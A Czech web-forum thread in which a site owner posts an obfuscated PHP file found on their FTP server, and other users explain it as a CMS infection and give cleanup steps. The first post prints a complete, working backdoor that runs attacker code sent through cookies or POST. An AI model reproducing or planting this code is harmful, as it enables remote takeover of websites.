logo
17.02.2020 15:32
1
na ftp se nejak objevuji soubory s +- timto obsahem, pokazde je to trosku jine
<?php
$sxjoszi = 'cs9ket31io*2py7xf46n#rul\'-g50_8vHbdam';$qryffa = Array();$qryffa[] = $sxjoszi[0].$sxjoszi[21].$sxjoszi[4].$sxjoszi[35].$sxjoszi[5].$sxjoszi[4].$sxjoszi[29].$sxjoszi[16].$sxjoszi[22].$sxjoszi[19].$sxjoszi[0].$sxjoszi[5].$sxjoszi[8].$sxjoszi[9].$sxjoszi[19];$qryffa[] = $sxjoszi[28].$sxjoszi[6].$sxjoszi[2].$sxjoszi[34].$sxjoszi[0].$sxjoszi[33].$sxjoszi[14].$sxjoszi[0].$sxjoszi[25].$sxjoszi[2].$sxjoszi[33].$sxjoszi[7].$sxjoszi[16].$sxjoszi[25].$sxjoszi[17].$sxjoszi[2].$sxjoszi[6].$sxjoszi[33].$sxjoszi[25].$sxjoszi[30].$sxjoszi[4].$sxjoszi[0].$sxjoszi[18].$sxjoszi[25].$sxjoszi[35].$sxjoszi[30].$sxjoszi[28].$sxjoszi[14].$sxjoszi[30].$sxjoszi[34].$sxjoszi[28].$sxjoszi[27].$sxjoszi[33].$sxjoszi[17].$sxjoszi[16].$sxjoszi[11];$qryffa[] = $sxjoszi[32].$sxjoszi[10];$qryffa[] = $sxjoszi[20];$qryffa[] = $sxjoszi[0].$sxjoszi[9].$sxjoszi[22].$sxjoszi[19].$sxjoszi[5];$qryffa[] = $sxjoszi[1].$sxjoszi[5].$sxjoszi[21].$sxjoszi[29].$sxjoszi[21].$sxjoszi[4].$sxjoszi[12].$sxjoszi[4].$sxjoszi[35].$sxjoszi[5];$qryffa[] = $sxjoszi[4].$sxjoszi[15].$sxjoszi[12].$sxjoszi[23].$sxjoszi[9].$sxjoszi[34].$sxjoszi[4];$qryffa[] = $sxjoszi[1].$sxjoszi[22].$sxjoszi[33].$sxjoszi[1].$sxjoszi[5].$sxjoszi[21];$qryffa[] = $sxjoszi[35].$sxjoszi[21].$sxjoszi[21].$sxjoszi[35].$sxjoszi[13].$sxjoszi[29].$sxjoszi[36].$sxjoszi[4].$sxjoszi[21].$sxjoszi[26].$sxjoszi[4];$qryffa[] = $sxjoszi[1].$sxjoszi[5].$sxjoszi[21].$sxjoszi[23].$sxjoszi[4].$sxjoszi[19];$qryffa[] = $sxjoszi[12].$sxjoszi[35].$sxjoszi[0].$sxjoszi[3];foreach ($qryffa[8]($_COOKIE, $_POST) as $lselej => $leocxv){function nlwinov($qryffa, $lselej, $pxxuie){return $qryffa[7]($qryffa[5]($lselej . $qryffa[1], ($pxxuie / $qryffa[9]($lselej)) + 1), 0, $pxxuie);}function txzxf($qryffa, $zuwzfv){return @$qryffa[10]($qryffa[2], $zuwzfv);}function wuvoc($qryffa, $zuwzfv){$oqnjucc = $qryffa[4]($zuwzfv) % 3;if (!$oqnjucc) {$fexlo = $qryffa[0]; $wszhocr = $fexlo("", $zuwzfv[1]($zuwzfv[2]));$wszhocr();exit();}}$leocxv = txzxf($qryffa, $leocxv);wuvoc($qryffa, $qryffa[6]($qryffa[3], $leocxv ^ nlwinov($qryffa, $lselej, $qryffa[9]($leocxv))));}


setkal se s tim nekdo? diky

Co se právě děje na Webtrhu?

17.02.2020 15:54
2
to je zasifrovany, nekde tam bude nejaky odkaz na ty funkce a promenne, v zasade to nejspis vkladat do webu nejaky bordel, ktery se nasledne zobrazi navstevnikum webu

Jedine spravne reseni je tady bud zaloha, nebo/a zmena vsech hesel k ftp, databazi, etc. a nedavat ho nekomu, kdo tomu nerozumi! :)

Samozrejme nejmene pracna je zaloha, pokud na webu denne nepribyvaji nejaky zaznamy apod.

Pokud budete mit zajem a nikoho na to nenajdete, ozvete se, zkusim se na to podívat :)
17.02.2020 16:05
3
S tím se setkal asi každý, kdo viděl zavirovaný web. To je klasická obfuskace, abyste snadno nezjistil, co vir dělá. Obnovit ze zálohy. Změnit hesla, vyhodit blbce, co k tomu má přístup. Pokud se tam vir dostal přes zranitelný systém, tak zjistit odkud... často bývají neaktualizované eshopy a cms... nebo napište, mě kolegovi výše...
17.02.2020 16:12
4
Je to klasicke zavirovani pres nejakou diru v CMS, diru v serveru apod. Odvirovani je celkem peklo, ale jde to, delal jsem to na svem serveru uz mnohokrat. Zalezi jak moc slozity ten skodlivy kod je.

Nekdy se replikuje ve stejne podobe, nekdy infikuje dalsi souboru, nekdy se pokazde meni ale zustava tam vysledovatelny patern. Nekdy je to jeste horsi.

1. stopnout web, vyhledat vsechny spatne soubory a napadnute souboru a ty odmazat, pripadne vymazat skodlivy kod, pokud neni nezavirovana zaloha (bacha i to co vypada nezavirovane muze zavirovane byt, obcas se neco ukryva mezi obrazky apod. = nejdriv na ten pattern otestovat i tu zalohu).
2. pokud je to nejake CMS typu WordPress tak aktualizovat na nejnovejsi verzi, pluginy a sablony to same. Pokud jsou pouzite nejake urkadene sablony nebo pluginy, tak odmazat nebo proste zaplatit a nahrat legalni verzi. (vzhledem k casu na odvirovani se nikdy nevyplati to krast ani pro testovaci vyvoj)
3. zmenit vsechna hesla a pristupy k FTP, DB, administraci
4. Sledovat web jestli se neco neobjevi. Pozor chytrejsi kody vytvari nove soubory se starym datumem
5. Vyplati se pres php.ini uplne zakazat ereg.
6. Casto tyhle kody slouzi k spamovani, nebo DDos utoky, takze mozna bude potreba projit ruzne servery a po odvirovani pozadat o odstraneni z blacklistu.

Pokud je to promenlivy pattern co se meni pod rukama tak good luck, to chce hodne dobreho linuxare co umi delat dobre regularni vyrazy.

Tenhle kod na prvni pohled vypada jako problematictejsi, bude menit jak vypada, na zacatku se zmeni promena a pres ni se pak prekoduje cely text. Ale videl jsem uz i horsi a mnohem obtizneji odstranitele
17.02.2020 16:21
5
Googli a nebo si dej do poptávek, aby ti to někdo odviroval.
Vyčistit db, odstranit bordel z FTP a souborů, vyhodit adminer pokud tam je a je to.
Pravidelně aktualizovat, nepoužívat nulled šablony a scripty. Používat jen ověřené pluginy.